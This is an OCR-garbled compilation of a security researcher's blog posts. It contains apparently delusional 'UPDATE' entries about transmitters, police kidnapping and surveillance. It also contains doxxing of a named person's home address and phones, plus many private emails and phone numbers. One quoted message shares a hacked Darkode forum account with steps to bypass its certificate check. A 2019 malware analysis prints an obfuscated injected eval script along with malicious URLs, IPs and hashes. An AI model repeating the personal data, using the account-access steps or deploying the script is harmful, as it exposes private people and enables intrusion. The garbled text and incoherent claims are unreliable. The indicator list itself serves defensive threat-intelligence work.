¢ [124]Spam email contains malware, not Apple gift card 

¢ [125]APT1, that scary cyber-Cold War gang: Not even China’s best 

¢ [126]Mass website hacking tool alerts to dangers of Google dorks 

¢ [127]C &C PHP script for staging DDoS attacks sold on underground forums 


¢ [128]Russian Malware-as-a-Service Offers Up Server Rentals for $240 a Pop 
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¢ [129]Java exploit kit sells for $40 per day 

¢ [130]Buggy DIY botnet tool leaks in black market 

¢ [131]New DIY Google Dorks Based Hacking Tool Released 

¢ [132]Botnets for rent, criminal services sold in the underground market 


¢ [133]Spam email contains malware, not Apple gift card 


UPDATE: It appears that someone placed a remote robot at local police department capable 
of recording my life including my life-being leading to a ruined career work relationships and 
intellectual property. 


UPDATE: It appears that an unknown group of people is attempting to communicate with me 
using a transmitter on my mouth using plastic paper in their mouth. 


UPDATE: It appears that someone is permanently trying to hide my eyes using plastic 
paper apparently using a transmitter that’s been apparently placed on my mouth. It also 
appears that the person behind the transperant is attempting to move closely thereby ruining 
my equipment and life-being. 


Some results may have been removed under data protection law in Europe. Learn 
more 


UPDATE: It appears that the transperant is operated by someone relying on lenses in- 
cluding bottles to map and touch-point related activities of an individual in place following 
persistent harassment and life-being manipulation. 
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Svettin 
To Anonymous above: I'm pretty sure internet access can't be denied in Bulgaria. Also apart from illegal it 


would be unenforceable 


Anonymous 
What is Dancho's nationality? The story mentions the US Embassy. Is he an American citizen? 
Surfer 


nttp://deterrent.net/ 


In a related news article - "[134]ZDNet Security Blogger Goes Missing in Bulgaria" covering 
my disappearance | came across to a juicy comment referencing the work of a well-known 
artist which leads me to research a little bit further leading me to the following CD/Vinyl label - 
"Blue Sabbath Black Cheer / Griefer - We Hate You / Dancho Danchev Suck My Dick" courtesy 
of the the following individual. 
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GRIEFER 


DANCHO DANCHEV 
SUCK MY DICK 


Take into consideration the following brief post regarding the associated individual: 


"It’s 2010 and I’m stumbling upon a defaced image of my head shot (circa 2006). |! 
never actually bothered about what others say, even when they insist that I’m maliciously 
enjoying the fact that | profile, expose, and disrupt cybercrime campaigns when there’s no 
time for enjoyment, as the stakes are too high. 


The defaced headshot is part of the released back in 2010 album "We Hate You/Dancho 
Danchev S*ck my D*ck" by the Blue Sabbath Griefer group. 
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So who's behind this "black PR" campaign? Who’s the mysterious Photoshop-er? It’s a 
[135]Canadian music artist called [136]Ron Brogden, who spends his spare time coding for 
hire, when he’s not photoshoping my headshots. 


Hatred-friendly domain name reconnaissance: 

deterrent.net - 95.142.172.70 - Email: slave@codegrunt.com 

Domain owner: Ron Brogden, Secondary emai: moron@industrial.org 
Music Label Address: P.O. Box 8021; Victoria, BC, Canada; V8W 3R7 
Home address: 647 Speed Avenue, Victoria, British Columbia, V8Z 1A5 


Phone: +1.250-360-0372; +1.250-381-0088 
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Responding to the same IP are also the following domains operated by Ron: 
codegrunt.com 

deterrent.net 

industrial.org 


nuckflix.com" 


Hello, 
If you receive this that mean you are someone that i can trust. 
I've hacked a darkode account recently and i thought you will be interested. 


But before here are some recommandations to keep the account safe: 

- I*ve not shared this account to only you 

- If a thread is marked as ‘not read* on darkode don't read it: let the 
original account owner read it first 


- you can view who is online on darkode without being logged: 
aiiiewiontine php 


- Take screenshots if you want but make sure to hide the account name and 
the karma field on messages if you publish something. 


As you know Darkode need a special SSL cert (like maza, directconnection 
and some other private boards i will not tell..) 

The SSL things can be avoided if you connect from IP (and i think darkode 
guys don't know that) 

And another cool things, darkode is running on phpbb2, (session is stored 
on the url and don't collide, you can log from multi place at the same 
time) 


To log into darkode go to Cf login. php 


User: Nassef 


Send the form and now you are redirected to darkode.com who ask a cert, 
just replace https://darkode.com by EI on the url and enjoy. 


Regards 


In terms of my 2010 disappearance | also recently came across to the following [137]screen- 
shots courtesy of the cybercrime-friendly forum Darkode courtesy of an individual known as 
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Xylitol discussing my disappearance including a possible Hitman Request charging at $10,000. 
Unfortunately, the screenshots were taken using the name of Nassef with whom Xylitol shared 
his accounting details with me including the taking of the screenshots. 
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Dancho Danchev? 
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white hat info 


UPDATE: It appears that my 2010’s disappearance is slowly turning into a modest [138]kid- 
napping attempt on behalf of Bulgarian law enforcement in constitution with DANS (State 
Agency for National Security) who appear to have been operating a long-turn operation to ruin 
my reputation intellectual property and work relationships successfully holding me a hostage 
for a period of seven years following a long-run kidnapping and harassment attempts leading 
to a ruined career intellectual property violation and work relationships. 


Operating a remotely-operated gas pomp with azbest targeted at my place Bulgarian 


6094 


law enforcement in constitution with DANS (State Agency for National Security) appear to 
have successfully tracked down and manipulated my life-being following a successful set 
of long-run kidnapping and harassment attempts leading to a successfully ruined career 
intellectual property violation and work relationships. 


It appears that Bulgarian law enforcement in constitution with DANS (State Agency for 
National Security) have placed remote stickers on my place and have managed to successfully 
map my place leading to a successful illegal entry courtesy of an unknown person followed 
by another unknown person supposedly a colleague followed by an illegal entry courtesy of 
unknown police officers who took my ID an escorted me to a local institution without explaining 
the reason for holding me hostage there. 


It appears that the group is operating a transperant using feelings to map and touch 
point related activities of the individuals in place following a successful kidnapping and 
harassment attempt leading to illegal entry and possible kidnapping attempt. It appears that 
Bulgarian law enforcement in constitution with DANS (State Agency for National Security) 
have managed to place a plastic sticker in my mouth leading to a successful monitoring and 
tracking including the use of a transperant leading to a successful kidnapping and harassment 
attempt leading to a ruined career intellectual property violation and work relationships. 


UPDATE: [139]Great News: Missing Cybersecurity Expert Dancho Danchev Is No Longer 
Missing, [140]We need help with the strange disappearance of Dancho Danchev, [141]Secu- 
rity Researcher, Cybercrime Foe Goes Missing, [142]Dancho Danchev: Missing cybersecurity 
expert, [143]Cybercrime Blogger Vanishes After Finding Tracking Device In His Bathroom, 
[144]Zero Day blogger Dancho Danchev: he’s back, [145]The Strange Disappearance of 
Dancho Danchev, [146]We need help with the strange disappearance of Dancho Danchev, 
[147]Mystery Surrounds Cyber Security Blogger Dancho Danchev’s Whereabouts, [148]Up- 
date on Dancho Danchev, [149]ZDNet Security Blogger Mysteriously Disappears, [150]ZDNet 
Blogger Disappears Mysteriously In Bulgaria, [151]ZDNet Blogger Disappears Under Mysteri- 
ous Circumstances 
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UPDATE: Prior, to, my, stay, in, another, town, I, was, contacted, by, Riva Richmond, 
(riva@rivarichmond.com), and, set, up, a, meeting, to, discuss, a, potential, New York Times, 
article. 
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UPDATE: Prior, to, my, stay, at, this, particular, apartment, I, contacted, Nart Villeneuve, 
(n.villeneuve@secdev.ca), seeking, assistance, signaling, potential, trouble. 


UPDATE: Prior, to, my, stay, at, a, local, institution (dpblovech@abv.bg), for, a, pe- 
riod, of, three, months, the, same, person, Kamen Kovachev (Kamen Tzura) (tsy- 
rov@abv.bg), was, released, by, another, person, known, as, Nesho Sheygunov 
(https://www.facebook.com/nesho.sheyguno v). 


UPDATE: While, my, stay, at, a, local, institution (dpblovech@abv.bg), for, a, period, of, three, 
months, another, person, that, |, Know, Kamen Kovachev (Kamen Tzura) (tsyrov@abv.bg), 
was, taken, to, the, room, where, |, was, confined, and, |, spent, a, night, in, the, corridor. 
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UPDATE: While, |, was, taken, to, a, local, institution (dpblovech@abv.bg), for, a, period, 
of, three, months, |, had, my, phone, taken, and, I, was, confined. 


UPDATE: While, |, was, taken, out, of, my, place, to, an, unknown, car, the, fuel, was, 
charged, to, someone, that, |, Know. 


UPDATE: Prior, to, my, stay, at, a, local, institution (dpblovech@abv.bg), |, was, offered, 
to, take, vitamins. 
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UPDATE: My, place, was, recently, visited, by, unknown, men, taking, me, to, local, po- 
lice, department (hxxp://troyan-police.com; police _troyan@abv.bg), and, asking, me, to, 
write, that, my, equipment, was, interfering, with, that, of, local, police, department. 


UPDATE: It, appears, that, someone, has, taken, the, time, and, effort, to, take, a, t-shirt, of, 
mine. 


UPDATE: Prior, to, my, visit, at, a, local, hotel, (hxxp://central-hotel.com/en; central@central- 
hotel.com), some, of, my, clothes, were, missing. 
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UPDATE: It, appears, _ that, my, place, was, recently, supposedly,  vis- 
ited, by, Plamen, Dakov (hxxp://universalstroi.com), Hristo, Radionov 
(hxxp://universalstroi.com; hxxp://www.facebook.com/hristo.radionov), and, Ivailo, Dochkov 
(hxxp://www.facebook.com/ivodivo), who, left, money, for, me. 


UPDATE: Prior, to, my, attendance, in, a, local, institution (dpblovech@abv.bg), Ivailo, 
Dochkov (hxxp://www.facebook.com/ivodivo), tried, to, meet, me. 
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UPDATE: Prior, to, my, attendance, at, this, particular, apartment, |, was, invited, by, Briana 
Papa (Briana@crenshawcomm.com), to, visit, Prague, on, behalf, of, Avast! Software, where, I, 
met, with, Vince Steckler (steckler@avast.com), and, Miloslav, Korenko (korenko@avast.com), 
where, I, met, with, Lucian Constantin (hxxp://twitter.com/Iconstantin). 


Prior, to, my, attendance, at, this, apartment, I, was, also, invited, to, another, event, held, at, 
INTERPOL, by, Steve Santorelli 


(steve.santorelli@gmail.com), which, |, successfully, attended, and, presented, at, where, |, 
also, met, with, Krassimir Tzvetanov (krassi@krassi.biz). 


Something, else, worth, pointing, out, is, that, my, place, is, visited, by, an, unknown, 
woman, known, as, Boriana Mihovska, an, unknown, man, known, as, Leonid, an, un- 
known, person, known, as, Tzvetan Georgiev (hxxp://www.youtube.com/user/laron640; 
tzvetan.leonid@gmail.com); (hxxp://plus.google.com/107108766077365473231), and, an, 
unknown, person, known, as, Dobrin Danchev (hxxp://www.facebook.com/dobrin.danchev); 
(hxxp://www.sibir.bg/parachut), and, another, unknown, person, known, as, Ina, Dancheva 
(http://otkrovenia.com/bg/profile/innadancheva). 
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The, most, recent, visit, to, my, place, was, by, a, person, Known, as, Vasil, Stanev, from DANS 
(dans@dans.bg), who, was, supposedly, asking, me, to, take, a, job, and, consequently, asked, 
me, to, attend, a, doctor, session. 


Dear, blog, readers, |, feel, it’s, about, time, I, post, an, honest, response, regarding, my, 
[152]disappearance, in, [153]2010, with, the, [154]purpose, of, [155]information, my, 
[156]readers, on, my, [157]current, situation, and, [158]to, continue, [159]posting, and, 
contributing, valuable, threat, intelligence, to, the, security, community. 


In, 2010, I, moved, to, an, apartment, located, in, another, town, and, apparently, my, 
apartment, have, been, vandalized, including, persistent, harassment, by, my, neighbors, 
including, a, possible, illegal, entry, courtesy, of, the, person, responsible, for, hiring, the, 
apartment (Kalin Petrov; kalin _petrov@hotmail.com). 


After, a, persistent, chase, down, and, harassment, courtesy, of, the, person, responsible, for, 
hiring, the, apartment, I, received, a, notice, to, leave, and, had, my, apartment, visited, by, 
the, person, responsible, for, hiring, including, another, man, including, another, man, that, 
was, supposedly, supposed, to, take, care, of, my, belongings. 


Prior, to, my, accommodation, |, was, contacted, by, Pauline, Roberts 
(pauline.roberts@ic.fbi.gov), who, recommended, me, to, Yavor,' Kolev’§ (ja- 
vor.kolev@gmail.com), and, Albena, Spasova (albaadvisors@gmail.com), from, Bulgarian, 
local, authorities, followed, by, a, series, of, communication. 
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Prior, to, returning, to, my, place, in, 2011, my, house, was, vandalized, by, three, police, offi- 
cers (hxxp://troyan-police.com; police troyan@abv.bg), from, the, local, police, department, 
who, entered, my, house, in, particular, my, bedroom, and, unpolitely, asked, my, to, dress, 
while, showing, me, a, copy, of, my, personal, ID, that, |, haven’t, presented, and, taking, me, 
to, an, unknown, car, without, explaining, the, reason, for, taking, me. 
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Sample Email communication between me, Pauline Roberts, Javor Kolev and Albena 
Spasova circa 2010: 


Original message sent by Pauline Roberts - 2010 
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Second email received from Pauline Roberts - 2010 


Original message received by Albena Spasova - 2010 


Dear Padine. 
Thank you very much for introducing un to Mr Ounchex 


Dear Me Danchey, 


| would wery rach welcome the opportunity of organizing # meeting and introdkxing each other, | am not ware if you are baued in Bulgaria or plane 


Belgrr 
Looting forward hearing trom you. 
Hind regerds 


Abers 
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in the recent teture we can ¢ 


NET OF Skype. My ID is albenaipasove with a 
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Original response issued to Pauline Roberts, Javor Kolev, and Albena Spasova - 2010 


Zdraweite Albena, Javor, 


Nadqvam se nqmate nishto protiv da govorg na ti, vupreki che ne se 
poznavame lichno, nadqvam se tova skoro da se promeni. Purvo, 
izvingqvam se za zakusnenieto s otgovora, po dobre kusno otkolkoto 
nikoga. Poglednah syllabus-a na Academigta i ne che sum imal 
predrasuduci, no bgh prigtno iznenadan ot temite koito se discutirat i 
nai-veche ot poziciite na horata koito sa gi pravili. In short - 
opredeleno ima s kakvo da contribute kato temi i expertise. 


Shte se opitam da obqsnq po-tochno v kakvi areas imam opit over email. 


- Security awareness perspective/presenting etc. 

Povecheto prezentacii koito pravq sa na invite-only conferences, 
trusted set of folks, za da se poluchi maximalen efect v sravnenie s 
masovi conferencii za publichnost, tui kato ne sum ot tipa hora koito 
“rushat iztochnici na informaciq™ za publichnost etc. attachvam edna 
prezentaciq kogto sum pravil s Honeynet Project-a 
http://www.honeynet.org , za da dobiete nqkakva predstava. Pretendiram 
che imam mnogo dobri presenting skills, v smisul che moga da obqsnqvam 
ednakvo na technical i ne chak tolkova technical audience. 


Tova e portfolio of 350+ statii/research koito sa za mass audience: 
http: //www.zdnet.com/topics/dancho+danchev 


A tova e edin “best practice" type of paper koito go pisal 2003 godina: 
http: //www.windowsecurity.com/pages/security-policy.pdf 


- Operational level expertise 

Obshto vzeto tova e osnovno koeto pravg, bez speculacii za trends ili 
fads, a real data za opredelini grupi, schemi, i ataki. Mnogo dobre 
sum networked v smisul, private mailing lists sus personal contacts 
within the industry, vuzmojnost za dostup do malware samples, ili info 
za opredelena ataka ot perspectivata na vsitski big vendors koeto 
spodelqt info s ideqta da zashtitqt vuzmojno nai-golqm broi clienti, 
contacti sus key persons vuv vajni ISP-ta i CERT-ove za da moje da se 
reagira momentalno pri opredel tip ataka v dadenata strana etc. 
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Original response issued to Pauline Roberts, Javor Kolev, and Albena Spasova - 2010 - Part 
Two 


Publikuvam maluk % ot vsitskig profiling koito pravq na bloga si, i 
shte se radvam ako pri purva vuzmojnost pregledate stari prouchvanigq 
po opredeleni temi, povecheto za incident response articles, za da 
dobiete predstava, drugite sa kato on demand reports i ne se 
publikuvat publichno: 


- http://ddanchev.blogspot.com/ 


Adnal sum Albena v Skype, she accepted.. © V momenta sum v BG, Sofia, 
telefona mi e 0888 996 888 - durja da otbeleja che si poluchih nomera 
sluchaino predi 10 godini. 


Nadqvam se skoro da si organizirame sreshta, i da vidim face to face. 
Vupreki che vinagi sum rabotil s mejdunarodni clients/organizacii, 
kraino vreme e da contribute za CERT Bulgaria, i opredeleno shte sum 
polezen asset! 


Ochakvam info kak precenqvate che e nai-dobre da procedirame. 


S uvajenie, 
Dancho 


P.S 
BG e malka strana, purvata stranica kogto teenagerite ot ISP-to 
narochno otvoriha beshe Arena-BG...i taka...:-) 


Cyber Threats/CyberCrime Analyst | Security Blogger, ZDNet at CBS Interactive 
Personal Blog: http://ddanchev.blogspot.com 

ZDNet Blog: http://blogs.zdnet.com/security 

Twitter: http://twitter.com/danchodanchev 

LinkedIn: http://www. linkedin. com/in/danchodanchev 


Original message received by Albena Spasova - 2010 
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Zdravei Dancho, 

Mnogo ti blagodarea za podrobnata informatia, a sashto i projavenijat interes za satrudnichestvo. 

Shte se radvam da se sreshtnem dokato si v Sofia. Dnes ti zvaneah, za da si ugovorim sreshta. Tel mi e 0887303289 i mi e otskoro :))) 
Best i do skoro, 


Albena 


Original response issued by Javor Kolev - 2010 


idravey Dancho, az sushto sum izvun Sofie do 07.09. Nadyavam se sled tazi date ds se vidia. Podolu sa moyte kontakti, Pordravi, Yavor 
Best regards, 

thief inspector Vavee Kolev, 

dead of Cybercrime and IP Section and 24/7 National Contact Point for High-Tech Crime at General Directorate “Combating Organized Crime” - Ministry of Interior 
‘obile +359 888795021 

toe +359 2 846530) 

Prone #359 2 9828342 

b-mail: chief@cyberceime be 

e-mail; javor.koleviigmai] com 

Sent via BlackBerry, 

>rowlded by Mobiitel 


Original response issued to Javor Kolev - 2010 
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Zdrawei Yavor, addnah si nomera, zaduljitelno si ugovargqme sreshta, az 
poemam iniciativata. 


France? 


Dancho 


Original response issued by Javor Kolev - 2010 - Part Two 


Gstsal, selo blizo do Borovetc @ 
Gest regards, 
Chief inspector Yavor Kolev, 


Head of Cybercrime and IP Section and 24/7? National Contact Point for High-Tech Crise at General Oirectorate “Combating Organized Crise” Ministry of Intector 
Mobile +359 SBB79S021 
Fax 359 2 8665303 


Prone +350 2 9828342 

e-mail: chiefScyberceine be 
e-mail: javor.kolev@amall.cos 
Sent vie BlackBerry, 
Provided by Mobiltel 


Original response issued to Javor Kolev - 2010 - Part Two 
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Zdrasti Yavore, 


Attachvam ti PPT-to koeto napravih naskoro na mqsto koeto sus sigurno 
znaesh i si hodil tam poveche puti ot men. Mladi hora => borgt se i si 
otstoqvat poziicite @ Shte se radvam da komentirash, ideqta e da 
vidish nivoto na znanigta i research-a koito pravq. 


Vupreki che ytre e weekend, se interesuvah imash li jelanie/vuzmojnost 
da se vidim da piem po neshto, neoficialno i kakto se kazva vednuj 
zavinagi da se zapoznaem, i eventualno namerim nachin da rabotim 
zaedno? Ako ne, on Monday mislq che stava sushto. 


Let me know. 


Best 


Original response issued by Javor Kolev - 2010 - Part Three 


idravey Dancho, utre shte se vidia s Albena wv 11 1 shte imam malko rabote s neys. Sled towa mojes da piem po bire nyakuse v Vujnia park. 
fest regards, 

thief inspector Vavor Kolev, 

dead of Cyberceime, IPR and Gambling Section and 24/7 Wational Contact Point for High-Tech Crime at General Directorate “Combating Organized Crime” - Ministry of Interior 
fobile +399 BEBTOSe21 

fax +359 2 864520) 

home 0350 2 9828342 

b-mall: chief@cybercrine be 

b-mail: jovor.kolev@geall com 

Sent via BlackBerry, 

Prowlded by Mobiltel 
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Perfect. Shte se chuem/SMS da se ugovorim kude i koga tochno ytre. Ima 
i nadejda za hubavo vreme @ 


3est, 


Original response issued by Javor Kolev - 2010 - Part Four 


* 
fest regards, 

thief inspector Vavee Kolev, 

tas of Cyterceriae, IPR and Gambling Section and 24/7 Watlonal Contact Point for wigh-Tech Crime at General Oirectorate “Combating Orgasized Crime” Ministry of Interior 
fobile +359 sea7ese21 

Fax o359 2 8665303 

Phome 0359 2 9628342 

pmol: chiefPcyberceime te 

e-mail: javor.kolevigmstl.com 

bent via SlackSerry, 

Srowlded by Mobiltel 


Original response issued to Javor Kolev - 2010 
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Zdrasti Yavore, 


Jalko che ne uspehme da se vidim dnes, tui kato vupreki che mi se 
iskashe da govorim za dosta po profesionalni temi, kato che li az ti 
uvajavam rabotata poveche otkolkoto ti moqta, i nqma kak da ti namekna 
za ngkoi points koito me bezpokogt i vuprosi koito iskah da te pitam. 
4\z go davam profesionalno i straight to the point, nadqvam se i ti i 
vednuj zavinagi da si produljim po profesionalnig si put i eventualno 
nqkoi den, ako se naloji da se poluchi neshto productivno ot facta che 
se imame kato kontakti. 


Vuprosi: 

- Koga shte moga da si vzema dush na spokoistvie, i kak shte stane tova? @ 
- Centralna Cooperativna Banka tvurdi (do rabotodatelq mi) che ne 

"moje da svurje imeto mi sus smetkata" za poluchavane na plashtane ot 
rabotodatelq mi CBS Interactive, chast ot CBS Corporation, za PRUV put 

za poslednite 2 godini i polovina. Shte probvam sus trite si imena - 

SANCHO [EES DANCHEV, shte se poluchi li tozi put? 


Points: 

- Az neznam dali vuobshte poglejdash research-a koito ti prashtam (2 
presentations so far, sus permission), no sled tezi “projectori” imam 
problemi sus sigurnostta si, v smisul takuv poslednoto neshto ot koeto 
imam nujda e NEDOVERIE za socialno-orientiranata mi rabota na 
nejdunarodno nivo, kogto nqma nishto obshto sus neshtata koito se 
Sluchvat v rodinata mi - BULGARIA, a ako eventualno ngkoga ima TI si 
the point of contact for anything BG related! 


Priqten weekend, i shte se radvam na otgovorite ti, ili v nai-dobrigq 
Sluchai nqkakvo razvitie v pravilnata (pone spored men) posoka. 


5 uvajenie, 


Original response issued by Javor Kolev - 2010 - Part Five 
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tdeasti Oancho, 

Snte ainesh li dnes prez GOO0® , kakto se rarbrahme ra cholo 27:30-28:06 ? 
fest regards, 

thief inspector VYavor toler, 

eed of Cybererine, IPR and Gambling Section and 24/7 National Contact Polet for High-Tech Ceiee at Gereral Directorate “Combating Organized Crime” - Ministry of Interior 
‘bile +359 s887095021 

Fax #359 2 8665303 

Phome +359 2 OR2NI42 

p-madl: chleficyberceime be 

bemail: javor, koleviemel) com 

bent wia BlackBerry, 

Prowided by Mobiltel 


Original response issued to Javor Kolev - 2010 


Zdrasti Yavore, 


Ne predpochitash 1i da piem kafe nqkude navun, po neoficialeno da 
govorim? S Taxi sum vse pak..., NDK parkove-te sa blizo @ 


Shte se radvam da uspeem da se coordinirame i da se vidim+govorim 
dnes. Let me know. 


Best, 
Dancho 
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Original response issued by Javor Kolev - 2010 - Part Six 


Cotte, imam sreshta ot 17:68 1 kato peiklyuche shte ti rvenne. 

Best regerds, 

Chief inspector Yavor Kolev, 

Mead of Cybercrime, IPR and Gambling Section and 24/7 Nations] Contact Point for High-Tech Crime at General Directorate “Combating Organized Crime” - Ministry of Interior 
Mobile +350 aeB70Se21 
fax 0359 2 8665303 
Phone #359 2 9828342 
e-mail: chiefficybercr's 
e-mail: javor. kolevitgeal 
Sent via Blackterry, 
Provided by Mobiltel 
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A, few, hours, later, I, find, myself, located, in, an, institution (dpblovech@abv.bg), for, a, 
period, of, three, months, without, anyone, explaining, the, reason, for, holding, me, there. 


Upon, entering, |, had, my, phone, taken, without, having, received, any, sort, of, expla- 
nation, for, taking, me, and, holding, me, there. 


UPDATE: My most recent visit to local police department was to announce a possible 
food-poisoning and | was told not to live in my place. 


Given, this, circumstances, |, feel, that, it, has, become, highly, unproductive, to, con- 
tinue, my, work, and, therefore, I’m, currently, seeking, a, permanent, relocation, including, 
a, possible, full, time, career, opportunity, in, the, field, of, cybercrime, research, security, 
blogger, or, threat, intelligence, analyst. 
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In case you're aware of someone looking to hire full-time threat intelligence analyst cybercrime 
researcher or a security blogger feel free to approach me at dancho.danchev@hush.com 
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15.4.2 Introducing Unit-123.org - Cyber Threat Intelligence Portal (2019-04-12 21:41) 
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Dear blog readers, | wanted to take the time and effort and introduce you to my latest project 
called [1]Unit-123.org where you can find quality research articles in a variety of topics that | 
will be publishing on a daily basis with the idea to bring back the spirit of my editorial years 
and to continue spreading quality data information and knowledge to a loyal base of users 
and readers. 


Feel free to reach me at dancho.danchev@hush.com 


Stay tuned! 
1. 


15.4.3 Flashpoint Intel Official Web Site Serving Malware - An Analysis 
(2019-04-22 08:32) 


UPDATE: Flashpoint Intel issued a [1]response to my research. 


UPDATE: [2]SCMagazine picked up the story. 


UPDATE: [3]Anti-Malware.name picked up the story. 
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UPDATE: [4]EnterpriseTimes picked up the story 


UPDATE: [5]Rambler News picked up the story. 


It appears that [6]Flashpoint’s official Web site is currently embedded with malware-serving 
malicious script potentially exposing its visitors to a multi-tude of malicious software. 


<style></style><script language=javascript>eval (String. fromCharCode(118, 97, 114, 32, 98, 32, 6 46, 1 
2, 114, 111, 109, 67, 104, 97, 114, 67, 131, 108, 101, 40, 49, 48, 52, 2, 49, 49, $4, 44 44, 
2, 49, 49, $3, 4 32, $3, 56, 44, 32, 52, 55, 44, 32, $2, 5S, 44, 32, 48, 44, 32, 49, 4 
9, $4, 44 3, $3, 44, 32, 49, 49, 48, 44, 32, 49, 50, 49, 44, 32, 49, 49, $7, 44 49, 
8, 36, 44 aa, a9 4 aa 48, 51, 44, 32 48, 4 
9, 44, 32 “4, 49 5 aa 46, 49, 44 $i, 
4, 32, 49 32, 49, 50, 4 4, 32, 49, 49, 50, 44, 32, 49, 48, 49, 44, 32, 5 » 32, 53, 51, 4 32, 
3, Si, 44 6, 41, 59, 32, 100, 111, 99, 117, 169, 1021, 110, 116, 46, 108, 111, » 97, 116, 105, 112, 110, 46, 114, 101, 112, 10 
8, 99 8, 96, 41, 59, 108, 111, 99, 117, 109, 101, 116, 116, 46, 168, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 162, 
61, 98, S59, 119, 105, 110, 100, 131, 119, 46, 108, 111, 99, 97, 116, 105, 121, 110, 46, 104, 114, 101, 102, 61, 98, 59));</script></style 
tyle 


Original malicious URL hosting location: 
hxxp://www.flashpoint-intel.com/404javascript.js 


hxxp://www.flashpoint-intel.com/404testpage4525d2fdc 


Related malicious URL redirection chain: 


hxxp://www.flashpoint-intel.com -> hxxp://destinywall.org/redirect?type=555 - : 
hxxp://ermoyen.tk/index/?4831537102803 -> hxxp://search.plutonium.icu/?utm 
_medium=7710edb9b- -> _ hxxp://search.plutonium.icu/?utm  _term=66793697539 -> 
hxxp://search.plutonium.icu/proc.php?37ba8df02céd -> hxxp://onwardinated.com/c/5a37c8ad- 
f104-11e5-9f1f -> hxxp://circultural.com/v/c3937168-5def-11e9-b07a -> 
hxxp://3daa61.circultural.com/I/8c579bd6-2433-1le 
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Loading Player 
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Second sample URL redirection chain: 

hxxp://www.flashpoint-intel.com/ —_-> hxxp://destinywall.org/redirect?type=555 & - 
> hxxp://ermoyen.tk/index/?4831537102803 -> hxxp://search.plutonium.icu/?utm 
_medium=7710edb9b- ->_—shxxp://search.plutonium.icu/?utm _term=66793698655- -> 


hxxp://search. plutonium. icu/proc.php?123dd67462ec -> hxxp://onwardinated.com/c/5a37c8ad- 
f104-11e5-9f1f -> hxxp://circultural.com/v/d45c2e40-5def-11e9-bd47 


Related legitimate URL known to have participated in the campaign: 


hxxp://boards.greenhouse.io/flashpoint/jobs/4125871002?gh jid=4125871002 


Related malicious URL redirection chain: 


hxxp://unanimous.live/ - 104.28.24.233- hxxp://jsc.adskeeper.co.uk/a/d/adw.toolb- 
ar.com.333699.js 


hxxp://destinywall.org/redirect?type=555 & - 176.123.9.53 -> hxxp://ermoyen.tk/index/?4831537102 
- 37.230.116.105 
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Related malicious URLs known to have participated in the campaign: 
hxxp://oussercondition.tk/index/?4831537102803 
hxxp://testify.newsfeed.support/esuznxifqk?c=15 &amp 


hxxp://impress.newsfeed.support/esuznxifqk?c=20 &amp 


AS 134763 CHINANET Guangdong province 


Jestinywall.org 


hxxp://minently.com/RnSda/rDN3/ojdn/-nsy 7qV12UzZKdEcILfy6SOfF-12243GPMrEyUTBKdtG 
ICYIxwB8e?qDo=MS WW __AGG _Desktop &subid=6679367743860375570 &extl1=1608 


hxxp://minently.com/RnSda/rDN3/uSJk/-nsy7qV12UzKdEcILfy6SOfF-12Z43GPMrEyUTBKdtG 
ICYIxwB8e/_jVh7fd2IUHCfkQjLfPyHo _ZayrHiuU?ori=6x &ex=6 &pbi=5cb1e1a50b08e2.738349245 


hxxp://minently.com/RnSda/rDN3/uSJk/-nsy 7qV12UzKdEcILfy6SOfF-12Z43GPMrEyUTBKdtG 
ICYIxwB8e/_jVh7fd2IRfKJxFOKvzyETF1t74kzXE?ori=6x &ex=6 &pbi=5cblelac8e8cd8.865930185 
- 205.147.93.131 


hxxp://search.plutonium.icu/?utm _term=6679367743860375570 &clickverify=1 &utm 
_content=fdc2c69a9 - 99.198.108.198 


hxxp://minently.com/RnSda/rDN3/uSJk/-nsy 7qV12UzKdEcILfy6SOfF-12Z243GPMrEyUTBKdtG 
ICYIxwB8e/_jVh7fd1kUSXfhYjK _7yHXZI1b-Xzt8?ori=6x &ex=6 &pbi=5cble2eVebe9a2.271109695 
- 205.147.93.131 


hxxp://click.monetizer-return.com/?utm _medium=f0b5c66dbbca0c7df1803313f76c9a781- 
d4f8 


e57 - 198.143.165.221 
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hxxp://play.superlzpre.com/red/?code=RY6GVO6HT5VM &a=6679370333725656167 &pu- 
bid=1608 - 217.13.124.95 


Related malicious domains known to have participated in the campaign: 
hxxp://destinywall.org - 176.123.9.53 

hxxp://hellofromhony.org 

hxxp://hellofromhony.com 

hxxp://thebiggestfavoritemake.com 

hxxp://destinywall.org 

hxxp://verybeatifulpear.com 

hxxp://strangefullthiggngs.com 


hxxp://stopenumarationsz.com 


Related malicious and fraudulent IPs known to have participated in the campaign: 


hxxp://onwardinated.com - 52.85.88.105; 52.85.88.202; 52.85.88.224; 52.85.88.151; 
52.85.58.244; 52.85.58.217 ; 52.85.58.236 ; 52.85.58.52 


hxxp://205.147.93.131 


hxxp://99.198.108.198 
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hxxp://217.13.124.95 
hxxp://143.204.247.69 


hxxp://143.204.214.90 


Related malicious MD5s known to have participated in the campaign: 
MD5: b28e98bb6ed0e0af8ec7a2d47ca6b053 

MD5: f0dfab9f9ala7e5dc8c00222292e401e 

MD5: 6b986d4bc5475af102bfff4d28a5cf50 

MD5: e963ed9b5c052d02c972e449142f7946 


MD5: 7dee4f221d3b3779301f4b38061d6992 


Related malicious MD5s known to have participated in the campaign: 
MD5: 30f6d6bd507317dbcf1708edc449c970 

MD5: 437cfb417c5a6e7fc3d446dcd35203fc 

MD5: elfd735fdf97cc734ec46d2b33aac8bf 

MD5: b37b7d221526faa8ffbea52626e5ac87 


MD5: 821a00b057a9fabe670174eab4b28e77 
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Related malicious MD5s known to have participated in the campaign: 
MD5: Obb4e038celfecb88be583d776cfa4a0 

MD5: 7197f433b0d269848ae1d1e957a9b858 

MD5: 1d72d5255bd2450fb04a7a2c68ff87bd 

MD5: b3722ade8c3ee908b6f82ae81ae2d748 

MD5: 89ddddb5b3a88ef3d6da57c72197e0cc 

MD5: 6a490bbd341db8033ec86fc771f24926 

MD5: b52d0377b2f741dd20e17dfad3ca58aa 

MD5: 813e84f9bd30eed6390f5ce806916f2a 

MD5: 81810b6e4c89c03260a6bac4al6ef3ba 


MD5: c9cb7f2ea5b8al1 6f4fb4246825e8a3de 


Related malicious and fraudulent URLs known to have participated in the campaign: 
hxxp://notifymepush. info 

hxxp://101newssubspush. info 

hxxp://Bestofnewssubspush. info 

hxxp://Burningpush.info 

hxxp://Checkadvisefriends.info 


hxxp://Checksayfriends.info 
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hxxp://Checksuefriends.info 
hxxp://Conewssubspush. info 
hxxp://Enewssubspush. info 
